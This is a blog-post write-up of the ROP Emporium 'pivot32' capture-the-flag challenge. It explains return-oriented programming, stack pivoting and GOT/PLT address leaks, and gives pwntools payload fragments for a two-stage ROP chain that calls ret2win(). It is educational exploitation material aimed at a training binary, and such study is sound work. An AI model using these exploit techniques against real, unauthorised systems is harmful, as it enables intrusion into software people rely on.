<!DOCTYPE html>
<html lang="en-us">

<head>
     
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>ROP It Like It&#39;s Hot: ROP Basics - Stack Pivoting</title>
    <style>

    html body {
        font-family: 'Raleway', sans-serif;
        background-color: white;
    }

    :root {
        --accent: #ffe135;
        --border-width:  5px ;
    }

</style>





<link rel="stylesheet" href="https://bananamafia.dev//css/font.css">


 <link rel="stylesheet" href="https://bananamafia.dev//css/solarized-dark.min.css"> 


<link rel="stylesheet" href="https://bananamafia.dev//css/bootstrap-min.css" integrity="">


<link rel="stylesheet" href="https://bananamafia.dev//css/main.css">


<link rel="stylesheet" href="https://bananamafia.dev//css/font-awesome.min.css" integrity="">
 


<script src="/js/highlight.min.js"></script>


<script src="/js/python.min.js"></script> 
<script src="/js/cpp.min.js"></script> 
<script src="/js/json.min.js"></script> 
<script src="/js/go.min.js"></script> 

<script>
  hljs.initHighlightingOnLoad();
</script>




<script async src="https://www.googletagmanager.com/gtag/js?id=UA-143157939-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag() { dataLayer.push(arguments); }
  gtag('js', new Date());

  gtag('config', 'UA-143157939-1');
</script>





















<script src="/js/jquery.min.js"></script>


<script src="/js/bootstrap.min.js"></script>


<script>$(document).on('click', function () { $('.collapse').collapse('hide'); })</script>


<script src="/js/confetti.browser.js"></script> <meta name="generator" content="Hugo 0.70.0" />
    

    
</head>




<body>
     
    <nav class="navbar navbar-default navbar-fixed-top">

        <div class="container">

            <div class="navbar-header">

                <a class="navbar-brand visible-xs" href="#">ROP It Like It&#39;s Hot: ROP Basics - Stack Pivoting</a>

                <button class="navbar-toggle" data-target=".navbar-collapse" data-toggle="collapse">
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>

            </div>

            <div class="collapse navbar-collapse">

                
                <ul class="nav navbar-nav">
                    
                    <li><a href="/">Home</a></li>
                    
                    <li><a href="/post/">Posts</a></li>
                    
                    <li><a href="/project/">Projects</a></li>
                    
                </ul>
                

                
                <ul class="nav navbar-nav navbar-right">
                    
                    <li class="navbar-icon"><a href="mailto:banana@bananamafia.dev"><i class="fa fa-envelope-o"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://github.com/ps1337/"><i class="fa fa-github"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://twitter.com/CaptnBanana"><i class="fa fa-twitter"></i></a></li>
                    
                    <li class="navbar-icon"><a href="/index.xml"><i class="fa fa-rss"></i></a></li>
                    
                    <li class="navbar-icon"><a href=""><i class="fa fa-toggle-off"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://www.youtube.com/watch?v=ao2GL3NAWQU"><i class="fa fa-envira"></i></a></li>
                    
                    <li class="navbar-icon"><a href="https://www.paypal.com/cgi-bin/webscr?cmd=_donations&amp;business=banana@bananamafia.dev&amp;item_name=Buy&#43;Me&#43;A&#43;Banana&amp;no_note=0&amp;cn=&amp;currency_code=EUR&amp;bn=PP-DonationsBF:btn_donateCC_LG.gif:NonHosted"><i class="fa fa-money"></i></a></li>
                    
                </ul>
                

            </div>

        </div>

    </nav>


    <script>
        
        
        

        
        $(".fa-toggle-off, .fa-toggle-on").parent().removeAttr("href");

        
        window.onload = setMode();

        function setMode() {
            const currentTheme = localStorage.getItem('bananamafia_theme') ? localStorage.getItem('bananamafia_theme') : null;

            if (currentTheme == "light" || currentTheme == null) {
                setLight();
            }
            else {
                setDark();
            }
        }

        function setDark() {
            document.documentElement.setAttribute('data-theme', 'dark');
            localStorage.setItem('bananamafia_theme', 'dark');

            $(".fa-toggle-off").each(function (i) {
                $(this).removeClass("fa-toggle-off");
                $(this).addClass("fa-toggle-on");
            });
        }

        function setLight() {
            document.documentElement.setAttribute('data-theme', 'light');
            localStorage.setItem('bananamafia_theme', 'light');

            $(".fa-toggle-on").each(function (i) {
                $(this).removeClass("fa-toggle-on");
                $(this).addClass("fa-toggle-off");
            });
        }

        $(".fa-toggle-off, .fa-toggle-on").on("click", function () {
            const currentTheme = localStorage.getItem('bananamafia_theme') ? localStorage.getItem('bananamafia_theme') : null;
            $("body").addClass("transition-bg");
            $("nav").addClass("transition-bg");
            if (currentTheme == "dark") {
                setLight();
            } else {
                setDark();
            }

            setTimeout(function () {
                $("body").removeClass("transition-bg");
                $("nav").removeClass("transition-bg");
            }, 500);

        });

        
        $(document).ready(function () {
            $(".fa-money").mouseenter(function () {
                confetti.reset();

                confetti({
                    useWorker: true,
                    particleCount: 200,
                    angle: 90,
                    spread: 70,
                    origin: {
                        x: 0.5, y: 1
                    },
                    startVelocity: 60
                });
            });
        });
    </script>

<main id="main">

    <div class="item">

    
    
    

    

    <h4><a href="/post/binary-rop-stackpivot/">ROP It Like It&#39;s Hot: ROP Basics - Stack Pivoting</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    
    <a href="https://bananamafia.dev/tags/exploitation"><kbd class="item-tag">exploitation</kbd></a>
    
    <a href="https://bananamafia.dev/tags/binary"><kbd class="item-tag">binary</kbd></a>
    
    <a href="https://bananamafia.dev/tags/r2"><kbd class="item-tag">r2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/radare2"><kbd class="item-tag">radare2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/rop"><kbd class="item-tag">rop</kbd></a>
    

</div>


    <br>
    <div class="content-width text-justify"><p>Let&rsquo;s check out Return Oriented Programming (ROP) with the <code>pivot32</code> challenge from <a href="https://ropemporium.com/challenge/pivot.html">ROP Emporium</a> by using <code>radare2</code>. The <code>pivot32</code> binary is compiled without stack canaries and PIE but has NX enabled.</p>
<h1 id="basics">Basics</h1>
<p>The <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">general principle behind ROP</a> is that:</p>
<p><em>[&hellip;] an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine&rsquo;s memory, called &ldquo;gadgets&rdquo;.[2] Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code. Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks.</em></p>
<p>Cool, thanks Wikipedia.</p>
<p>The reason why ROP is required for this challenge is that the available space for the payload is quite small and not sufficient in order to get the flag. Because of this, it&rsquo;s required to <em>pivot the stack</em> to another location that contains a second stage payload that gets the flag. To accomplish this, the <code>ESP</code> (Stack Pointer) register will be modified the by first stage payload. The new base pointer will then point to an attacker-controlled fake stack that contains the second stage. This new stack is also set up during the exploitation process. The fake stack consists of another ROP chain, just like the first stage.</p>
<p>During exploitation the ROP gadgets will be executed one after another since they are terminated by a <code>ret</code> instruction. A <code>ret</code> causes the program flow to return to the address that&rsquo;s currently on the top of the stack. For gadget <code>n</code> this will then be gadget <code>n+1</code> &ndash; the ROP chain is getting executed successfully.</p>
<p>The way the exploitation of <code>pivot32</code> takes place is that it re-uses the gadgets of the binary itself in order to call a function named <code>ret2win()</code> of the enclosed shared object <code>libpivot32.so</code>. This function simply performs a <code>cat</code> on the file <code>flag.txt</code> by invoking <code>system()</code>. Unfortunately, this function isn&rsquo;t imported by <code>pivot32</code>, so it&rsquo;s first required to acquire the address of a known symbol that&rsquo;s being imported by the target binary. The symbol <code>foothold_function()</code> serves exactly for this purpose. By getting the address of this function it&rsquo;s then possible to compute the address of <code>ret2win()</code> using a static offset and call it.</p>
<p>Luckily <code>pivot32</code> already helps in the exploitation process: It prints the address that has to be pivoted to:</p>
<pre><code>The Old Gods kindly bestow upon you a place to pivot: 0xf7d2ef10
</code></pre><p>Of course this address changes upon each invocation, so exploitation has to take place dynamically - for example using <code>pwntools</code>. By combining <code>pwntools</code> with my <a href="https://github.com/ps1337/pwntools-r2">pwntools-r2</a> module the exploit can be debugged with <code>radare2</code> on runtime.</p>
<p>Two inputs are requested using <code>fgets()</code> by the target process:</p>
<pre><code>pivot by ROP Emporium
32bits

Call ret2win() from libpivot.so
The Old Gods kindly bestow upon you a place to pivot: 0xf7d7bf10
Send your second chain now and it will land there
&gt; ABC
Now kindly send your stack smash
&gt; DEF

Exiting
</code></pre><p>The first console input to <code>pivot32</code> is being written exactly to the pivot location. This the input that will contain the second stage payload that will be executed after pivoting. The second input therefore has to contain the first stage payload containing the <code>EIP</code> overwrite and a mini ROP chain that pivots to the desired stack address.</p>
<h1 id="exploitation">Exploitation</h1>
<h2 id="eip-control">EIP Control</h2>
<p>Using the output of <code>ragg2 -r  -P 300</code>, a De Bruijn pattern, it has been determined that <code>EIP</code> gets overwritten after 44 bytes:</p>
<pre><code>[...]
Now kindly send your stack smash
&gt; AAABAACAADAAEAAFAAGAAH[...]
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41415041 code=1 ret=0
[0x41415041]&gt; wopO `dr eip`
44
</code></pre><h2 id="setting-up-the-stack-pivot">Setting Up The Stack Pivot</h2>
<p>The address to pivot to is already known. Therefore it&rsquo;s required to set <code>ESP</code> to this specific value. ROP gadgets that are useful for stack pivoting can be listed using <code>ropper</code>:</p>
<pre><code>ropper --file pivot32 --stack-pivot
[...]
Gadgets
=======

0x0804889b: add esp, 0x10; nop; leave; ret;
0x08048925: add esp, 0xc; pop ebx; pop esi; pop edi; pop ebp; ret;
0x0804856e: add esp, 8; pop ebx; ret;
0x0804856a: ret 0;
0x080486be: ret 0xeac1;
0x08048a4c: ret 0xfffd;
0x080488c2: xchg eax, esp; ret;
</code></pre><p>It seems that the easiest way to set the stack pointer to a specific value is by using the <code>xchg</code> gadget. It exchanges the <code>EAX</code> and <code>ESP</code> register values. The plan is therefore:</p>
<ol>
<li>Populate <code>EAX</code> with the printed pivot address - e.g. using a <code>pop eax</code></li>
<li>Use the <code>xchg</code> gadget to pivot to this exact address.</li>
</ol>
<p>The <code>pop eax</code> gadget has been found with <code>radare2</code> using <code>/R pop eax</code>, but using <code>pwntools</code> to search for it dynamically using the binary is also a way to do it:</p>
<img src="/img/binary-rop-stackpivot/snoop_search.gif" width="100%">
<pre><code>elf = ELF(&quot;./pivot32&quot;)
elfROP = ROP(elf)
POP_EAX = p32(elfROP.find_gadget([&quot;pop eax&quot;, &quot;ret&quot;])[0])
</code></pre><p>With all this information gathered, the stack pivoting first stage payload looks like this:</p>
<pre><code>POP_EAX = p32(elfROP.find_gadget([&quot;pop eax&quot;, &quot;ret&quot;])[0])
DO_PIVOT = p32(0x080488c2)  # xchg eax esp

STAGE1 = &quot;A&quot; * 44
STAGE1 += POP_EAX  # Load following pivot_addr in EAX
STAGE1 += pivot_addr
STAGE1 += DO_PIVOT  # Exchange EAX and ESP
</code></pre><h2 id="calling-ret2win">Calling <code>ret2win</code></h2>
<h3 id="got-and-plt">GOT and PLT</h3>
<p>For this step you have to know what the GOT and PLT are. You can watch <a href="https://www.youtube.com/watch?v=kUk5pw4w0h4">this</a> or you read <a href="https://ctf101.org/binary-exploitation/what-is-the-got/">this</a> or you don&rsquo;t and just read my brief and simplified explanation:</p>
<p>Upon calling the dynamically linked function <code>foothold_function()</code> from <code>libpivot32.so</code> for the first time, e.g. at process launch, the address of this function has to be determined first. To avoid doing this every time, the result of the resolution will be saved in the GOT (Global Offset Table) after the first call. Upon calling the function a second time, the existing GOT entry will be used. The address of the GOT entry for a specific function can be determined using <code>radare2</code> using <code>?v reloc.foothold_function</code>.</p>
<p>Initially the GOT will point to an entry in the PLT (Procedure Linkage Table). This entry in turn calls the dynamic linker that does the actual address resolution. The address of the PLT entry for a specific function can be read using <code>radare2</code> with <code>?v sym.imp.foothold_function</code>.</p>
<p>Or you use <code>pwntools</code>:</p>
<pre><code>elf = ELF(&quot;./pivot32&quot;)
FOOTHOLD_PLT = p32(elf.plt[&quot;foothold_function&quot;])
FOOTHOLD_GOT = p32(elf.got[&quot;foothold_function&quot;])
</code></pre><p>As long as the binary is not compiled with PIE, the aspects described in this section above are valid.</p>
<p>Please note that before being able to get the address of <code>foothold_function()</code>, it has to be called first at least once. This populates the entry in the GOT which can then be used by the ROP chain.</p>
<h3 id="second-stage-payload">Second Stage Payload</h3>
<p>The first thing the second stage payload has to perform is to call <code>foothold_function()</code> once. After that, it can read the GOT entry of this function and determine its real address. To calculate the address of <code>ret2win()</code> it&rsquo;s then required to know the offset between these two functions in the shared library. The easiest way to do this is to calculate this using <code>pwntools</code>:</p>
<pre><code>FOOTHOLD_WIN_DISTANCE = p32(lib.symbols[&quot;ret2win&quot;] -
                            lib.symbols[&quot;foothold_function&quot;])
</code></pre><p>This offset has then to be added to the determined address of <code>foothold_function()</code> to get the address of <code>ret2win()</code>. Calling the resulting address prints the flag. The ROP chain therefore looks like this:</p>
<pre><code>STAGE2 = &quot;&quot;
STAGE2 += FOOTHOLD_PLT  # Cause foothold resolution -&gt; Populates GOT
STAGE2 += POP_EAX  # Load the following address into eax
STAGE2 += FOOTHOLD_GOT
STAGE2 += MOV_EAX_EAX  # Dereference EAX (mov EAX, [EAX])
STAGE2 += POP_EBX  # Load the calculated offset into EBX
STAGE2 += FOOTHOLD_WIN_DISTANCE
STAGE2 += ADD_EAX_EBX  # Add the offset to EAX
STAGE2 += CALL_EAX  # Call @ the calculated ret2win address
</code></pre><p>All gadgets have been determined using the <code>/R</code> ROP gadget search function of <code>radare2</code>. The <code>MOV EAX, [EAX]</code> instruction causes the content of the GOT entry of <code>foothold_function()</code> to be read and stored into <code>EAX</code>. On runtime this contains the real address of this function since its dynamic resolution has already taken place.</p>
<p>Let&rsquo;s see it in action, starting with the execution of the first stage ROP payload. Be sure to watch the stack and the registers change:</p>
<center>
<video width="100%" height="100%" controls preload>
    <source src="/img/binary-rop-stackpivot/rop.webm"></source>
</video>
</center>
<img src="/img/binary-rop-stackpivot/snoop_ok.webp" width="100%">
<center>
<b>That's It!</b>
</center></div>

    
    

    

    <h4 id="related" class="page-header">Related</h4>

     <div class="item">

    
    
    

    

    <h4><a href="/post/srop/">SROP Exploitation with radare2</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/r2"><kbd class="item-tag">r2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/radare2"><kbd class="item-tag">radare2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/rop"><kbd class="item-tag">rop</kbd></a>
    
    <a href="https://bananamafia.dev/tags/exploitation"><kbd class="item-tag">exploitation</kbd></a>
    
    <a href="https://bananamafia.dev/tags/ctf"><kbd class="item-tag">ctf</kbd></a>
    

</div>
  <div class="item">

    
    
    

    

    <h4><a href="/post/gb-fuzz/">Fuzzing A GameBoy Emulator With AFL&#43;&#43;</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/fuzzing"><kbd class="item-tag">fuzzing</kbd></a>
    
    <a href="https://bananamafia.dev/tags/reversing"><kbd class="item-tag">reversing</kbd></a>
    
    <a href="https://bananamafia.dev/tags/exploitation"><kbd class="item-tag">exploitation</kbd></a>
    

</div>
  <div class="item">

    
    
    

    

    <h4><a href="/post/uaf-1/">Exploiting A Use-After-Free With radare2 - CTF Challenge</a></h4>
    <h5></h5>
    
    <a href="https://bananamafia.dev/tags/ctf"><kbd class="item-tag">ctf</kbd></a>
    
    <a href="https://bananamafia.dev/tags/reversing"><kbd class="item-tag">reversing</kbd></a>
    
    <a href="https://bananamafia.dev/tags/exploitation"><kbd class="item-tag">exploitation</kbd></a>
    
    <a href="https://bananamafia.dev/tags/r2"><kbd class="item-tag">r2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/radare2"><kbd class="item-tag">radare2</kbd></a>
    
    <a href="https://bananamafia.dev/tags/cutter"><kbd class="item-tag">cutter</kbd></a>
    
    <a href="https://bananamafia.dev/tags/heap"><kbd class="item-tag">heap</kbd></a>
    

</div>
 

    

</main>
<footer id="footer">
    <img style="width:42vh" src="/img/tag.png">

    <p class="copyright text-muted">

        © All rights reserved. Powered by <a href="https://gohugo.io">Hugo</a> and <a href="https://github.com/calintat/minimal">Minimal</a>
    </p>
</footer>
</body>

<script>
    var footerWidth = 200;
    $(document).ready(function () {
        setWidth();
        $(window).bind("resize", setWidth);
    });

    $(window).on('load', function () {
        setWidth();
    });

    function setWidth() {
        footerWidth = $("main").width();

        $("#footer").css("min-width", (footerWidth > 300 ? footerWidth : 300) + "px");
        
    }

    $(window).on('resize', function () {
        setWidth();
    });

</script>

</html>


<script>
    var width = 200;
    $(document).ready(function () {
        setMaxWidth();
        $(window).bind("resize", setMaxWidth);
    });


    function setMaxWidth() {
        $("pre > code").css("display", "none");
        $("pre").css("display", "none");

        width = $("#related").width();

        $("pre > code").css("display", "block");
        $("pre").css("display", "block");

        $("pre > code").css("maxWidth", (width) + "px");
        $("pre").css("maxWidth", (width) + "px");
    }

    $(window).on('resize', function () {
        setMaxWidth();
    });

    $(window).on('load', function () {
        setMaxWidth();
    });



</script>